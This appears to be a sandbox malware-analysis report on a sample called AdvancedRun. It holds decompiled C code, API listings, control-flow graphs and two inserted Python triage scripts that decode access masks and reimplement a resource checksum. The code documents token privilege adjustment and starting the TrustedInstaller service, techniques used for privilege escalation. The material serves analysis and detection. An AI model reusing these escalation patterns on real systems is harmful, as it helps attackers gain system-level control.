                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 862991418-565535830
                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
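                                                                  The two API listings above (the AdjustTokenPrivileges function and E00401306) are static cross-references from the IDA plugin, not a runtime trace (the "// executed" markers in the C code are what shows which path actually ran), but their format is regular enough to triage automatically. The Python below is an added example and not part of the Joe Sandbox report: it parses the report's "• Api.DLL(args), ref: addr" lines (copied verbatim from the two listings above), decodes the access masks the sample passes (0x34 to OpenServiceW; 0x28 in the GetCurrentProcess line, which is the slot OpenProcessToken's desired access occupies), and emits behaviour tags for the GetProcAddress-resolved privilege adjustment and the TrustedInstaller start. The tag wording, function names and the two access-right tables (values from winnt.h and winsvc.h) are the example's own.

```python
import re
from typing import Dict, List, NamedTuple

# API lines copied verbatim from the two listings above (the sandbox's static cross-references).
REPORT_API_LINES = """
• GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
• GetLastError.KERNEL32(00000000), ref: 00408FEA
• GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
• GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
• AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
• GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
• OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
• QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
• StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
• CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
"""


class ApiCall(NamedTuple):
    api: str
    dll: str
    args: List[str]   # raw argument cells; '?' means the plugin could not recover the value
    ref: int          # address of the call site


# One report line: optional "Part of subcall function XXXX:" prefix, then Api.DLL(args), ref: addr
_LINE_RE = re.compile(
    r"^\s*\u2022\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# Access-right bits (winnt.h / winsvc.h) used to decode the masks the sample passes.
TOKEN_ACCESS: Dict[int, str] = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
    0x0008: "TOKEN_QUERY", 0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT", 0x0100: "TOKEN_ADJUST_SESSIONID",
}
SERVICE_ACCESS: Dict[int, str] = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG", 0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS", 0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE", 0x0100: "SERVICE_USER_DEFINED_CONTROL",
}


def decode_mask(value: int, table: Dict[int, str]) -> List[str]:
    """Expand an access mask into the named bits it contains, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # headings, blank lines, anything that is not a call
        api, dll, argstr, ref = m.groups()
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        calls.append(ApiCall(api, dll.upper(), args, int(ref, 16)))
    return calls


def tag_behaviours(calls: List[ApiCall]) -> List[str]:
    """Turn the call list into the behaviour statements an analyst would write up."""
    tags: List[str] = []
    apis = [c.api for c in calls]
    # Names resolved through GetProcAddress show up as the second argument cell.
    resolved = {c.args[1] for c in calls if c.api == "GetProcAddress" and len(c.args) > 1}

    # Privilege chain: OpenProcessToken -> LookupPrivilegeValueW -> AdjustTokenPrivileges.
    if "LookupPrivilegeValueW" in apis and "AdjustTokenPrivileges" in apis:
        hidden = bool({"LookupPrivilegeValueW", "AdjustTokenPrivileges"} & resolved)
        tags.append("adjusts own token privileges"
                    + (" (resolved via GetProcAddress)" if hidden else ""))

    # Service start: OpenServiceW(scm, "TrustedInstaller", mask) followed later by StartServiceW.
    for idx, c in enumerate(calls):
        if c.api == "OpenServiceW" and len(c.args) >= 3 and c.args[1] == "TrustedInstaller":
            rights = "|".join(decode_mask(int(c.args[2], 16), SERVICE_ACCESS))
            started = any(x.api == "StartServiceW" for x in calls[idx + 1:])
            tags.append(f"opens TrustedInstaller service with {rights}"
                        + (" and starts it" if started else ""))
    return tags


if __name__ == "__main__":
    for tag in tag_behaviours(parse_api_lines(REPORT_API_LINES)):
        print(tag)
    # 0x28 from the GetCurrentProcess line is OpenProcessToken's desired access
    print("|".join(decode_mask(0x28, TOKEN_ACCESS)))
```

                                                                  The "?" cells and the trailing stack junk in the OpenServiceW line (the repeated 00402183 values) are kept as-is by the parser; the rules only look at the positional arguments the decompiled code actually uses, which is the safe way to consume these listings.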

                                                                  Control-flow Graph

                                                                  Basic blocks (id: address range, API called) and edges, as exported from the interactive graph:
                                                                  • 432: 40a33b-40a352 FindResourceW -> 433, 434
                                                                  • 433: 40a354-40a363 SizeofResource -> 435, 436
                                                                  • 434: 40a3b9-40a3be
                                                                  • 435: 40a365-40a371 LoadResource -> 436, 437
                                                                  • 436: 40a3b8 -> 434
                                                                  • 437: 40a373-40a37c LockResource -> 436, 438
                                                                  • 438: 40a37e-40a38c -> 439, 440
                                                                  • 439: 40a3aa-40a3b3 -> 436
                                                                  • 440: 40a38e -> 441
                                                                  • 441: 40a38f-40a3a7 -> 441, 442
                                                                  • 442: 40a3a9 -> 439
                                                                  C-Code - Quality: 100%
                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) { // _a4: hModule, _a8: resource type, _a12: resource name
                                                                  				struct HRSRC__* _t12;
                                                                  				void* _t16;
                                                                  				void* _t17;
                                                                  				signed int _t18;
                                                                  				signed int _t26;
                                                                  				signed int _t29;
                                                                  				signed int _t33;
                                                                  				struct HRSRC__* _t35;
                                                                  				signed int _t36;

                                                                  				_t12 = FindResourceW(_a4, _a12, _a8); // executed   (hModule, lpName, lpType)
                                                                  				_t35 = _t12;
                                                                  				if(_t35 != 0) {
                                                                  					_t33 = SizeofResource(_a4, _t35); // size in bytes; also mixed into the checksum below
                                                                  					if(_t33 > 0) {
                                                                  						_t16 = LoadResource(_a4, _t35);
                                                                  						if(_t16 != 0) {
                                                                  							_t17 = LockResource(_t16); // pointer to the resource bytes
                                                                  							if(_t17 != 0) {
                                                                  								_a4 = _t33;
                                                                  								_t29 = _t33 * _t33; // accumulator seeded with size^2
                                                                  								_t36 = 0;
                                                                  								_t7 =  &_a4;
                                                                  								 *_t7 = _a4 >> 2; // whole DWORDs only; up to three trailing bytes are never read
                                                                  								if( *_t7 != 0) {
                                                                  									do {
                                                                  										// C precedence: (dword * i * size * 0x11) ^ (dword + acc), with 32-bit wraparound;
                                                                  										// the product is 0 for i == 0, so the first DWORD is only added
                                                                  										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                  										_t36 = _t36 + 1;
                                                                  										_t29 = _t26;
                                                                  									} while (_t36 < _a4);
                                                                  								}
                                                                  								// Fold into a global: g = (g + acc) ^ size. A non-cryptographic checksum; what the
                                                                  								// sample compares it against is not visible in this excerpt.
                                                                  								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                  								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return 1; // always 1, so a caller cannot distinguish a missing resource from a hashed one
                                                                  			}

                                                                  				Decompiler address column for the lines above, flattened: 0x0040a348 0x0040a34e 0x0040a352 0x0040a35f 0x0040a363 0x0040a369 0x0040a371 0x0040a374 0x0040a37c 0x0040a380 0x0040a383 0x0040a386 0x0040a388 0x0040a388 0x0040a38c 0x0040a38f 0x0040a39f 0x0040a3a1 0x0040a3a5 0x0040a3a5 0x0040a3a9 0x0040a3aa 0x0040a3b3 0x0040a3b3 0x0040a37c 0x0040a371 0x0040a3b8 0x0040a3be

                                                                  APIs
                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
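                                                                  E0040A33B above is small enough to reimplement, which is what you would do to check a value of the global at 0x40fa70 against a resource carved from the dump. The Python below is an added example and not code from the report or from the sample: it applies the decompiled loop with the C precedence made explicit, (dword * i * size * 0x11) ^ (dword + acc) with everything reduced modulo 2^32, seeds the accumulator with size^2 and folds the result into the global exactly as the sample stores it. The input bytes are constructed for illustration; 0xfcb617dc is the global's value as the report records it before the fold.

```python
import struct

MASK32 = 0xFFFFFFFF
GLOBAL_IN_DUMP = 0xFCB617DC  # value the report shows at 0x40fa70 before the fold


def resource_checksum(blob: bytes) -> int:
    """Rolling checksum of E0040A33B over the DWORDs of a resource.

    Mirrors the decompiled loop: _t29 starts as size*size and, for each DWORD i,
    becomes (dword * i * size * 0x11) ^ (dword + _t29), truncated to 32 bits.
    Only len(blob) >> 2 DWORDs are read, so up to three trailing bytes never
    influence the result (their count still does, through `size`).
    """
    size = len(blob)
    acc = (size * size) & MASK32
    for i in range(size >> 2):
        dword = struct.unpack_from("<I", blob, i * 4)[0]   # little-endian, as on x86
        mixed = (dword * i * size * 0x11) & MASK32         # zero for i == 0
        acc = (mixed ^ ((dword + acc) & MASK32)) & MASK32
    return acc


def fold_into_global(prev_global: int, blob: bytes) -> int:
    """*0x40fa70 = (old + checksum) ^ size, as the sample stores it."""
    return ((prev_global + resource_checksum(blob)) & MASK32) ^ (len(blob) & MASK32)


def trailing_bytes_ignored(blob: bytes) -> bool:
    """True when len(blob) % 4 != 0 and inverting every byte past the last whole
    DWORD leaves the checksum unchanged (it always does, because the loop stops
    at size >> 2). False when there are no trailing bytes to test."""
    whole = len(blob) & ~3
    if whole == len(blob):
        return False
    flipped = blob[:whole] + bytes(b ^ 0xFF for b in blob[whole:])
    return resource_checksum(flipped) == resource_checksum(blob)


if __name__ == "__main__":
    # Constructed input: two DWORDs, 1 and 2, plus three junk bytes.
    sample = struct.pack("<II", 1, 2) + b"\xAA\xBB\xCC"
    print(hex(resource_checksum(sample)))
    print(hex(fold_into_global(GLOBAL_IN_DUMP, sample)))
    print(trailing_bytes_ignored(sample))
```

                                                                  Because the multiplier is i * size * 0x11, the first DWORD only gets added, and because the global is updated with + and ^ rather than compared, this function alone tells you nothing about whether the sample accepts or rejects a modified resource; that decision, if any, lives in whatever reads 0x40fa70 later.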

                                                                  Control-flow Graph

                                                                  Basic blocks and edges as exported from the interactive graph (node: "id start-end [calls]", edge: "a->b"; the dump was split across two lines by extraction and is joined here): 0 4022d5-402395 call 40b550 memset * 3 call 404923 wcschr 5 4023a6-4023ac 0->5 6 402397-4023a0 ExpandEnvironmentStringsW 0->6 7 40241a-402423 5->7 8 4023ae-4023c0 wcschr 5->8 6->5 10 402425-402434 wcschr 7->10 11 40244b-402468 call 404b5c 7->11 8->7 9 4023c2-402403 memset SearchPathW 8->9 9->7 12 402405-402419 call 404923 9->12 13 402473-40247c 10->13 14 402436-402449 ExpandEnvironmentStringsW 10->14 11->13 17 40246a-402470 11->17 12->7 19 40247e-402488 13->19 20 40248f-40249a 13->20 14->17 17->13 19->20 22 4024a0-4024a7 20->22 23 402537-40253d 20->23 22->23 26 4024ad-402531 memset * 2 call 4052f3 * 2 _wtoi * 2 22->26 24 402543-40254a 23->24 25 4025da-4025e3 23->25 24->25 28 402550-4025d4 memset * 2 call 4052f3 * 2 _wtoi * 2 24->28 29 4025e5-4025eb 25->29 30 40265d-402666 25->30 26->23 28->25 35 402633 29->35 36 4025ed-4025f9 wcschr 29->36 32 402668 30->32 33 40266b-402675 30->33 32->33 39 402683-40268b 33->39 40 402677-40267e call 401d1e 33->40 37 402634-40265a _snwprintf 35->37 36->35 42 4025fb-402631 memset ExpandEnvironmentStringsW 36->42 37->30 45 4026a3-4026ac 39->45 46 40268d-402693 39->46 40->39 42->37 50 4026b5-4026b8 45->50 51 4026ae-4026b3 45->51 46->45 48 402695-40269e call 401d1e 46->48 48->45 54 4026c6-4026cc 50->54 55 4026ba 50->55 53 4026bf-4026c1 call 401d1e 51->53 53->54 56 4026d5-4026db 54->56 57 4026ce-4026d3 54->57 55->53 60 4026e4-4026ea 56->60 61 4026dd-4026e2 56->61 59 402700-402702 call 401d1e 57->59 65 402707-402710 59->65 62 4026f3-4026f9 60->62 63 4026ec-4026f1 60->63 61->59 62->65 66 4026fb 62->66 63->59 67 402712-402731 call 405497 call 4055ec call 40135c 65->67 68 40276d-402770 65->68 66->59 88 402733-402738 call 4014e9 67->88 89 40273d-402754 call 401421 67->89 70 402776-4027bf call 405497 * 2 call 40149f call 4055ec call 40135c call 401551 68->70 71 40280b-40280e 68->71 72 402810-402811 71->72 73 402813 71->73 76 402814-402819 SetEnvironmentVariableW 72->76 73->76 79 40281f-40284a call 401fe6 76->79 91 40284c-40284f 79->91 92 40288e-40289c call 4055d1 79->92 88->89 103 402756 89->103 104 402759-402768 call 4054b9 89->104 91->92 97 402851-402857 91->97 97->92 101 402859-402888 call 401a3f GetProcessAffinityMask SetProcessAffinityMask 97->101 101->92 103->104 112 402803-402809 104->112 112->79 113 4027c1-4027c6 call 4014e9 70->113 114 4027cb-4027e2 call 401421 70->114 113->114 118 4027e4 114->118 119 4027e7-402801 call 4054b9 * 2 114->119 118->119 119->112
                                                                  C-Code - Quality: 83%
                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                  				WCHAR* _v8;
                                                                  				signed int _v12;
                                                                  				int _v16;
                                                                  				int _v20;
                                                                  				char* _v24;
                                                                  				int _v28;
                                                                  				intOrPtr _v32;
                                                                  				int _v36;
                                                                  				int _v40;
                                                                  				char _v44;
                                                                  				void* _v56;
                                                                  				int _v60;
                                                                  				char _v92;
                                                                  				void _v122;
                                                                  				int _v124;
                                                                  				short _v148;
                                                                  				signed int _v152;
                                                                  				intOrPtr _v168;
                                                                  				intOrPtr _v172;
                                                                  				intOrPtr _v176;
                                                                  				intOrPtr _v180;
                                                                  				void _v192;
                                                                  				char _v196;
                                                                  				char _v228;
                                                                  				void _v258;
                                                                  				int _v260;
                                                                  				void _v786;
                                                                  				short _v788;
                                                                  				void _v1314;
                                                                  				short _v1316;
                                                                  				void _v1842;
                                                                  				short _v1844;
                                                                  				void _v18234;
                                                                  				short _v18236;
                                                                  				char _v83772;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				short* _t174;
                                                                  				short _t175;
                                                                  				signed int _t176;
                                                                  				short _t177;
                                                                  				short _t178;
                                                                  				int _t184;
                                                                  				signed int _t187;
                                                                  				intOrPtr _t207;
                                                                  				intOrPtr _t219;
                                                                  				int* _t252;
                                                                  				int* _t253;
                                                                  				int* _t266;
                                                                  				int* _t267;
                                                                  				wchar_t* _t270;
                                                                  				int _t286;
                                                                  				void* _t292;
                                                                  				void* _t304;
                                                                  				WCHAR* _t308;
                                                                  				WCHAR* _t310;
                                                                  				intOrPtr* _t311;
                                                                  				int _t312;
                                                                  				WCHAR* _t315;
                                                                  				void* _t325;
                                                                  				void* _t328;
                                                                  
                                                                  				_t304 = __edx;
                                                                  				E0040B550(0x1473c, __ecx); // stack probe (_chkstk) for 0x1473c = 83772 bytes of locals
                                                                  				_t286 = 0;
                                                                  				 *_a4 = 0;
                                                                  				_v12 = 0;
                                                                  				_v16 = 0;
                                                                  				_v20 = 0;
                                                                  				memset( &_v192, 0, 0x40); // zero the STARTUPINFOW that starts at _v196 (cb is set below)
                                                                  				_v60 = 0;
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				_v24 = 0;
                                                                  				_v40 = 0;
                                                                  				_v28 = 0;
                                                                  				_v36 = 0;
                                                                  				_v32 = 0x100;
                                                                  				_v44 = 0;
                                                                  				_v1316 = 0;
                                                                  				memset( &_v1314, 0, 0x208); // two MAX_PATH WCHAR buffers (0x208 = 0x104 * 2)
                                                                  				_v788 = 0;
                                                                  				memset( &_v786, 0, 0x208);
                                                                  				_t315 = _a8; // settings block: program path at its start, further fields at WCHAR indices 0x2106 and 0x2668
                                                                  				_t328 = _t325 + 0x24;
                                                                  				_v83772 = 0;
                                                                  				_v196 = 0x44; // STARTUPINFOW.cb = sizeof(STARTUPINFOW) on x86
                                                                  				E00404923(0x104,  &_v788, _t315); // bounded (MAX_PATH) copy of the program path; helper body not on this page
                                                                  				if(wcschr(_t315, 0x25) != 0) { // '%': expand %VAR% references first
                                                                  					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                  				}
                                                                  				// Field set and no '\\' in the name: resolve a bare file name with SearchPathW(NULL, ...). With a
                                                                  				// NULL search path that looks in the application directory, the current directory (moved behind
                                                                  				// the Windows directory only when SafeProcessSearchMode is on), the system directories, the
                                                                  				// Windows directory and then PATH, so a same-named file in the current directory can win.
                                                                  				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                  					_v8 = _t286;
                                                                  					_v1844 = _t286;
                                                                  					memset( &_v1842, _t286, 0x208);
                                                                  					_t328 = _t328 + 0xc;
                                                                  					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8); // lpFilePart returned in _v8
                                                                  					if(_v1844 != _t286) {
                                                                  						E00404923(0x104,  &_v788,  &_v1844); // replace the bare name with the resolved full path
                                                                  					}
                                                                  				}
                                                                  				_t308 =  &(_t315[0x2106]);
                                                                  				if( *_t308 == _t286) {
                                                                  					E00404B5C( &_v1316,  &_v788);
                                                                  					__eflags = _v1316 - _t286;
                                                                  					_t315 = _a8;
                                                                  					_pop(_t292);
                                                                  					if(_v1316 == _t286) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L10;
                                                                  				} else {
                                                                  					_v20 = _t308;
                                                                  					_t270 = wcschr(_t308, 0x25);
                                                                  					_pop(_t292);
                                                                  					if(_t270 == 0) {
                                                                  						L11:
                                                                  						_t174 =  &(_t315[0x220e]);
                                                                  						if( *_t174 != 1) {
                                                                  							_v152 = _v152 | 0x00000001;
                                                                  							_v148 =  *_t174;
                                                                  						}
                                                                  						_t309 = ",";
                                                                  						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                  							_v260 = _t286;
                                                                  							memset( &_v258, _t286, 0x3e);
                                                                  							_v124 = _t286;
                                                                  							memset( &_v122, _t286, 0x3e);
                                                                  							_v8 = _t286;
                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                  							_v152 = _v152 | 0x00000004;
                                                                  							_t266 =  &_v260;
                                                                  							_push(_t266);
                                                                  							L0040B1F8();
                                                                  							_v180 = _t266;
                                                                  							_t328 = _t328 + 0x3c;
                                                                  							_t267 =  &_v124;
                                                                  							L0040B1F8();
                                                                  							_t292 = _t267;
                                                                  							_v176 = _t267;
                                                                  						}
                                                                  						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                  							_v260 = _t286;
                                                                  							memset( &_v258, _t286, 0x3e);
                                                                  							_v124 = _t286;
                                                                  							memset( &_v122, _t286, 0x3e);
                                                                  							_v8 = _t286;
                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                  							_v152 = _v152 | 0x00000002;
                                                                  							_t252 =  &_v260;
                                                                  							_push(_t252);
                                                                  							L0040B1F8();
                                                                  							_v172 = _t252;
                                                                  							_t328 = _t328 + 0x3c;
                                                                  							_t253 =  &_v124;
                                                                  							_push(_t253);
                                                                  							L0040B1F8();
                                                                  							_v168 = _t253;
                                                                  						}
                                                                  						_t310 =  &(_t315[0x105]);
                                                                  						if( *_t310 != _t286) {
                                                                  							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                  								_push(_t310);
                                                                  							} else {
                                                                  								_v18236 = _t286;
                                                                  								memset( &_v18234, _t286, 0x4000);
                                                                  								_t328 = _t328 + 0xc;
                                                                  								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                  								_push( &_v18236);
                                                                  							}
                                                                  							_push( &_v788);
                                                                  							_push(L"\"%s\" %s");
                                                                  							_push(0x7fff);
                                                                  							_push( &_v83772);
                                                                  							L0040B1EC();
                                                                  							_v24 =  &_v83772;
                                                                  						}
                                                                  						_t175 = _t315[0x220c];
                                                                  						if(_t175 != 0x20) {
                                                                  							_v12 = _t175;
                                                                  						}
                                                                  						_t311 = _a4;
                                                                  						if(_t315[0x2254] == 2) {
                                                                  							E00401D1E(_t311, L"RunAsInvoker");
                                                                  						}
                                                                  						_t176 = _t315[0x265c];
                                                                  						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                  							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                  						}
                                                                  						_t177 = _t315[0x265e];
                                                                  						if(_t177 != 1) {
                                                                  							__eflags = _t177 - 2;
                                                                  							if(_t177 != 2) {
                                                                  								goto L37;
                                                                  							}
                                                                  							_push(L"16BITCOLOR");
                                                                  							goto L36;
                                                                  						} else {
                                                                  							_push(L"256COLOR");
                                                                  							L36:
                                                                  							E00401D1E(_t311);
                                                                  							L37:
                                                                  							if(_t315[0x2660] == _t286) {
                                                                  								__eflags = _t315[0x2662] - _t286;
                                                                  								if(_t315[0x2662] == _t286) {
                                                                  									__eflags = _t315[0x2664] - _t286;
                                                                  									if(_t315[0x2664] == _t286) {
                                                                  										__eflags = _t315[0x2666] - _t286;
                                                                  										if(_t315[0x2666] == _t286) {
                                                                  											L46:
                                                                  											_t178 = _t315[0x2a6e];
                                                                  											_t358 = _t178 - 3;
                                                                  											if(_t178 != 3) {
                                                                  												__eflags = _t178 - 2;
                                                                  												if(_t178 != 2) {
                                                                  													__eflags =  *_t311 - _t286;
                                                                  													if( *_t311 == _t286) {
                                                                  														_push(_t286);
                                                                  													} else {
                                                                  														_push(_t311);
                                                                  													}
                                                                  													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                  													L63:
                                                                  													_t293 = _t311;
                                                                  													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                  													_t312 = _t184;
                                                                  													if(_t312 == _t286 && _v60 != _t286) {
                                                                  														_t363 = _t315[0x266c] - _t286;
                                                                  														if(_t315[0x266c] != _t286) {
                                                                  															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                  															_a4 = _a4 | 0xffffffff;
                                                                  															_a8 = _t286;
                                                                  															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                  															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                  														}
                                                                  													}
                                                                  													E004055D1(_t184,  &_v44);
                                                                  													return _t312;
                                                                  												}
                                                                  												E00405497( &_v92);
                                                                  												E00405497( &_v228);
                                                                  												E0040149F(__eflags,  &_v92);
                                                                  												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                  												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                  												_t204 = _a4;
                                                                  												__eflags =  *_a4;
                                                                  												if(__eflags != 0) {
                                                                  													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                  												}
                                                                  												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                  												_t207 = _v28;
                                                                  												__eflags = _t207;
                                                                  												_v16 = 0x40c4e8;
                                                                  												if(_t207 != 0) {
                                                                  													_v16 = _t207;
                                                                  												}
                                                                  												_v12 = _v12 | 0x00000400;
                                                                  												E004054B9( &_v228);
                                                                  												E004054B9( &_v92);
                                                                  												_t286 = 0;
                                                                  												__eflags = 0;
                                                                  												L58:
                                                                  												_t315 = _a8;
                                                                  												_t311 = _a4;
                                                                  												goto L63;
                                                                  											}
                                                                  											E00405497( &_v92);
                                                                  											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                  											_t359 =  *_t311 - _t286;
                                                                  											if( *_t311 != _t286) {
                                                                  												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                  											}
                                                                  											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                  											_t219 = _v28;
                                                                  											_v16 = 0x40c4e8;
                                                                  											if(_t219 != _t286) {
                                                                  												_v16 = _t219;
                                                                  											}
                                                                  											_v12 = _v12 | 0x00000400;
                                                                  											E004054B9( &_v92);
                                                                  											goto L58;
                                                                  										}
                                                                  										_push(L"HIGHDPIAWARE");
                                                                  										L45:
                                                                  										E00401D1E(_t311);
                                                                  										goto L46;
                                                                  									}
                                                                  									_push(L"DISABLEDWM");
                                                                  									goto L45;
                                                                  								}
                                                                  								_push(L"DISABLETHEMES");
                                                                  								goto L45;
                                                                  							}
                                                                  							_push(L"640X480");
                                                                  							goto L45;
                                                                  						}
                                                                  					}
                                                                  					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                  					L10:
                                                                  					_v20 =  &_v1316;
                                                                  					goto L11;
                                                                  				}
                                                                  			}
                                                                  0x004022d5
                                                                  0x004022dd
                                                                  0x004022e7
                                                                  0x004022ec
                                                                  0x004022f7
                                                                  0x004022fa
                                                                  0x004022fd
                                                                  0x00402300
                                                                  0x00402307
                                                                  0x0040230d
                                                                  0x0040230e
                                                                  0x00402318
                                                                  0x00402321
                                                                  0x00402324
                                                                  0x00402327
                                                                  0x0040232a
                                                                  0x0040232d
                                                                  0x00402334
                                                                  0x00402337
                                                                  0x0040233e
                                                                  0x0040234f
                                                                  0x00402356
                                                                  0x0040235b
                                                                  0x0040235e
                                                                  0x0040236d
                                                                  0x00402374
                                                                  0x0040237e
                                                                  0x00402395
                                                                  0x004023a0
                                                                  0x004023a0
                                                                  0x004023ac
                                                                  0x004023cf
                                                                  0x004023d2
                                                                  0x004023d9
                                                                  0x004023de
                                                                  0x004023f6
                                                                  0x00402403
                                                                  0x00402414
                                                                  0x00402419
                                                                  0x00402403
                                                                  0x0040241a
                                                                  0x00402423
                                                                  0x00402458
                                                                  0x0040245d
                                                                  0x00402464
                                                                  0x00402467
                                                                  0x00402468
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
